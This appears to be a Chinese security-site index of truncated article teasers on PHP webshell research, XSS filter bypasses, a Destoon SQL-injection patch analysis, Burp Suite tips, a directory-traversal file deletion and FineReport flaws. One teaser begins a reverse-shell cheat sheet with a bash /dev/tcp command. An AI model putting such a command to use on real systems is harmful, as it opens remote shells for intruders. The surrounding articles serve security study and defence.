字符串是以(即NUL)结尾的一串字符指针。所以一个字符串内部不可能包括任何NUL字符，但是，非字符串数据内部包含NUL的并不罕见。我们不能用字符串函数(如strcat/strcpy等)来处理这些数据，因为他...

首发drops：http://drops.wooyun.org/tips/3978 。 近期由于在开发自己的webshell，所以对PHP一些已有的漏洞进行了一定的研究，并且也自己发现了部分PHP存在的安全隐患。这篇文章我来与大家分享...

除了之前MK发布的一个bypass方法外（https://twitter.com/avlidienbrunn/status/486059626002395136），大牛们也陆续想出来一些针对性的绕过方法。我说的这个出自：http://www.thespanner.co.uk...

补丁分析 刚看到今天发布了Destoon 6.0 2017-01-09 更新，用我在【代码审计】小密圈里说过的方法，瞬间找到修复的一处SQL注入漏洞。用中午的20分钟，小小地分析一下。 我们先看看diff（左新右...

* 本文作者：shadow4u，本文属FreeBuf原创奖励计划，未经许可禁止转载 一年一度的Burpsuite过期的时间又到了，Burpsuite作为Web安全者必不可少的一件神器，其实有很多实用的技巧，本篇文章的目...

漏洞位置在index.php 279行左右，这里对删除的文件名没有任何限制，导致了可以进行目录跳转，从而删除其他目录的文件，即任意文件 private static function deleteFileT...

author：waitalone 1.bash版本 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1 bash -i >& /dev/tcp/10.0.0.1/8...

前言 由于帆软10.0报表系统前台只有一个登陆口，并且10.0的认证机制做了很大的改动，想要通过文件读取或者其他漏洞来获取管理员信息几乎不可能，所以下面所述的几个漏洞都是需要用户登录权限。g...

业务上，随着企业移动化进程的加速，企业业务上云或引进越来越多的SaaS服务，以为员工移动化办公提供轻量化办公环境。同时需要解决：Ø  不同用户角色（员工、外包、供应商…）的访问权限问题...

移动化办公，无疑已经成为了一种潜移默化的趋势。据调查统计，2015年全球37%工作人员迈入了移动化，2018年全球55%的商业IP流量属于移动商业互联网流量。他们或穿梭于城市之间，或在出差路上，或...